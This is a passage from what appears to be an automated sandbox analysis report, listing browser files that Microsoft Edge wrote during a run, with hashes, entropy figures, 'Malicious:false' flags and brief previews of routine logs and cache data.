                                                                                                                                                                                                                                                                                      Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:68SDK0QR0Xl/lUn/lxE0tllsKXwl:6lR0Ng
                                                                                                                                                                                                                                                                                      MD5:E87C26B11FDD1F445288A8EBF44840A1
                                                                                                                                                                                                                                                                                      SHA1:070551EBDE85CCA9B0EA8BCB9795BC44A530EDD4
                                                                                                                                                                                                                                                                                      SHA-256:BC4C30663F191F55977E6D02DF08E35128E31E7BB8BD3CF883E1BE05DAA177B3
                                                                                                                                                                                                                                                                                      SHA-512:C737472857D368986E1C0696ED7D7F59E85FEE53619B2EC40EDD402E853000FB489AA47D61E50A160D580FC4E82BFF828CDF3A5F290025375397FB746BD5BEAA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:@...O.7&oy retne.........................X....,................/|.l./.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF41b93.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:68SDK0QR0Xl/lUn/lxE0tllsKXwl:6lR0Ng
                                                                                                                                                                                                                                                                                      MD5:E87C26B11FDD1F445288A8EBF44840A1
                                                                                                                                                                                                                                                                                      SHA1:070551EBDE85CCA9B0EA8BCB9795BC44A530EDD4
                                                                                                                                                                                                                                                                                      SHA-256:BC4C30663F191F55977E6D02DF08E35128E31E7BB8BD3CF883E1BE05DAA177B3
                                                                                                                                                                                                                                                                                      SHA-512:C737472857D368986E1C0696ED7D7F59E85FEE53619B2EC40EDD402E853000FB489AA47D61E50A160D580FC4E82BFF828CDF3A5F290025375397FB746BD5BEAA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:@...O.7&oy retne.........................X....,................/|.l./.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.347046189876272
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:S+a8ljljljljlflcSpEafCMeyI9hdSkAvkAvkAv:Ra0ZZZZflcrRhdSk8k8k8
                                                                                                                                                                                                                                                                                      MD5:2429490C33A9AD11DA1A090E3B7FC372
                                                                                                                                                                                                                                                                                      SHA1:609996FB10A45F758F2E49B81B20C61F0B63EB8E
                                                                                                                                                                                                                                                                                      SHA-256:5F6CA4D59943591A9D9ED46C3DA467C31E13103C2C99488CE953ECB6FECB87AD
                                                                                                                                                                                                                                                                                      SHA-512:AF3C95AF11F4C41703B2672421A15BC5B0260D730BCA3D19E9202CD165FB985A15FDF00A9C63DF3B935B4B7F597FB2D7A9E97228189EC9664233C297CE280608
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................|b................next-map-id.1.Cnamespace-c34d3fc9_3a42_4a29_b442_b3835ffefb0c-https://ntp.msn.com/.0..g.k................map-0-shd_sweeper8{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".g.h.o.l.d.o.u.t.".}...map-0-storageTest. .................. .................. .................. .................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.107495429143391
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwTWGOq2PN723oH+TcwtrQMxIFUt8YIQwTWLZmw+YIQwTW+zkwON723oH+TcwJ:oQwvOvVaYebCFUt8rQwi/+rQwJ5OaYeL
                                                                                                                                                                                                                                                                                      MD5:04157C5E79033ED51AA3C7959B7B9E0D
                                                                                                                                                                                                                                                                                      SHA1:A6F81478F260943BDBA44C6439F740B7B049BF8F
                                                                                                                                                                                                                                                                                      SHA-256:AA715EEC2F4D193783566426CDF8D44A4E0436FF22B9864C039B82AE9654AF26
                                                                                                                                                                                                                                                                                      SHA-512:4D79B1057D05DE5AF797E0A0A5FF93D61F21DDB1D8B22FB3768A78A17D836861497CCA3297BC2D80BF8970EB363603B62CD69C4924B227CA827005EA8A6059F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.633 13d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/20-04:54:32.634 13d4 Recovering log #3.2024/11/20-04:54:32.637 13d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.107495429143391
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwTWGOq2PN723oH+TcwtrQMxIFUt8YIQwTWLZmw+YIQwTW+zkwON723oH+TcwJ:oQwvOvVaYebCFUt8rQwi/+rQwJ5OaYeL
                                                                                                                                                                                                                                                                                      MD5:04157C5E79033ED51AA3C7959B7B9E0D
                                                                                                                                                                                                                                                                                      SHA1:A6F81478F260943BDBA44C6439F740B7B049BF8F
                                                                                                                                                                                                                                                                                      SHA-256:AA715EEC2F4D193783566426CDF8D44A4E0436FF22B9864C039B82AE9654AF26
                                                                                                                                                                                                                                                                                      SHA-512:4D79B1057D05DE5AF797E0A0A5FF93D61F21DDB1D8B22FB3768A78A17D836861497CCA3297BC2D80BF8970EB363603B62CD69C4924B227CA827005EA8A6059F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.633 13d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/20-04:54:32.634 13d4 Recovering log #3.2024/11/20-04:54:32.637 13d4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13376570074126790

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.846494796856037
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:3/7zkj8LmPSpsAF4unxutLp3X2amEtG1ChqcFKlzl1Ag3pQKkOAM4lqHb:3/7zMjPSzFQLp2FEkChFKlzl1AtHOpGk
                                                                                                                                                                                                                                                                                      MD5:7C576DC85EE0A0BFA295463A6D7D3615
                                                                                                                                                                                                                                                                                      SHA1:731BD2BCEED7E77C6F9CC20CA709BFC3625A3332
                                                                                                                                                                                                                                                                                      SHA-256:78C3AF1A9AB073F91EB635D2D02A6D91521F789016DD6B8FA757F3278DABFA53
                                                                                                                                                                                                                                                                                      SHA-512:D6994D52613C5664A06BD67A8B4C540BB69BDFF6F76E13F7AA0F10EFC47965B8EB98488B456788EE2B73EAC471C4A661D5B616E424568F080868CBFF9DB21CB6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SNSS.......X..z...........X..z......"X..z...........X..z.......X..z.......Y..z.......Y..z....!..Y..z...............................X..zY..z1..,...Y..z$...c34d3fc9_3a42_4a29_b442_b3835ffefb0c...X..z.......Y..z....>OF........X..z...X..z.......................X..z....................5..0...X..z&...{46F3A197-DB49-410A-81B3-94975C835573}.....X..z.......Y..z...........Y..z........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x..........#U'.....#U'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.131253150734284
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQpUFjjL+q2PN723oH+Tcwt7Uh2ghZIFUt8YIQpP1Zmw+YIQpZLVkwON723oH+Q:oQuOvVaYebIhHh2FUt8rQF1/+rQ15Oa0
                                                                                                                                                                                                                                                                                      MD5:E339831789B626E8E918508E088D205B
                                                                                                                                                                                                                                                                                      SHA1:58ACF9666885EDAF22011AA19C9878C3E87394C8
                                                                                                                                                                                                                                                                                      SHA-256:8687F32041015C42F7F8AED7635B123A03F4B8106EAE42A43BB091845D2B11AF
                                                                                                                                                                                                                                                                                      SHA-512:72F18976BDDD2EA537916616B87022E9AD505DE1976D2D1E4BB67242435C959A38F8A85C367A5DB05935E736E7496B141A4E4E424BA7994C9F5CFCEF39E532E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.711 1f78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/20-04:54:31.712 1f78 Recovering log #3.2024/11/20-04:54:31.712 1f78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.131253150734284
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQpUFjjL+q2PN723oH+Tcwt7Uh2ghZIFUt8YIQpP1Zmw+YIQpZLVkwON723oH+Q:oQuOvVaYebIhHh2FUt8rQF1/+rQ15Oa0
                                                                                                                                                                                                                                                                                      MD5:E339831789B626E8E918508E088D205B
                                                                                                                                                                                                                                                                                      SHA1:58ACF9666885EDAF22011AA19C9878C3E87394C8
                                                                                                                                                                                                                                                                                      SHA-256:8687F32041015C42F7F8AED7635B123A03F4B8106EAE42A43BB091845D2B11AF
                                                                                                                                                                                                                                                                                      SHA-512:72F18976BDDD2EA537916616B87022E9AD505DE1976D2D1E4BB67242435C959A38F8A85C367A5DB05935E736E7496B141A4E4E424BA7994C9F5CFCEF39E532E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.711 1f78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/20-04:54:31.712 1f78 Recovering log #3.2024/11/20-04:54:31.712 1f78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):438
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2066732006888214
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:oQwG+vVaYebvqBQFUt8rQwIXW/+rQwTLV5OaYebvqBvJ:QVaYebvZg82lDOaYebvk
                                                                                                                                                                                                                                                                                      MD5:01799D2CEB12DB0EADEDD1A815BE5499
                                                                                                                                                                                                                                                                                      SHA1:B5B1D029D28364FE28462240E3E34BC03CCCDA47
                                                                                                                                                                                                                                                                                      SHA-256:596D264E100F5FC953A214D09135D68EFA883FACA32489F5E9DE6C0BB57FE8E5
                                                                                                                                                                                                                                                                                      SHA-512:2B48538357B32A4304B6E5E111B655FF2897804FBBBC3AB4A0279E779AD2252CC619D8A641DAE53412B41DC7DD4D48C7844118339DEF9EA2ECBFF888ADA9DBEA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.621 1c3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/20-04:54:32.639 1c3c Recovering log #3.2024/11/20-04:54:32.644 1c3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):438
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2066732006888214
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:oQwG+vVaYebvqBQFUt8rQwIXW/+rQwTLV5OaYebvqBvJ:QVaYebvZg82lDOaYebvk
                                                                                                                                                                                                                                                                                      MD5:01799D2CEB12DB0EADEDD1A815BE5499
                                                                                                                                                                                                                                                                                      SHA1:B5B1D029D28364FE28462240E3E34BC03CCCDA47
                                                                                                                                                                                                                                                                                      SHA-256:596D264E100F5FC953A214D09135D68EFA883FACA32489F5E9DE6C0BB57FE8E5
                                                                                                                                                                                                                                                                                      SHA-512:2B48538357B32A4304B6E5E111B655FF2897804FBBBC3AB4A0279E779AD2252CC619D8A641DAE53412B41DC7DD4D48C7844118339DEF9EA2ECBFF888ADA9DBEA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:32.621 1c3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/20-04:54:32.639 1c3c Recovering log #3.2024/11/20-04:54:32.644 1c3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\441d80ab-710a-4de9-b4c3-9e9cd7004611.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\9aea70f5-aba1-4fec-9492-7bd81b2e582c.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3cc98.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3d831.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
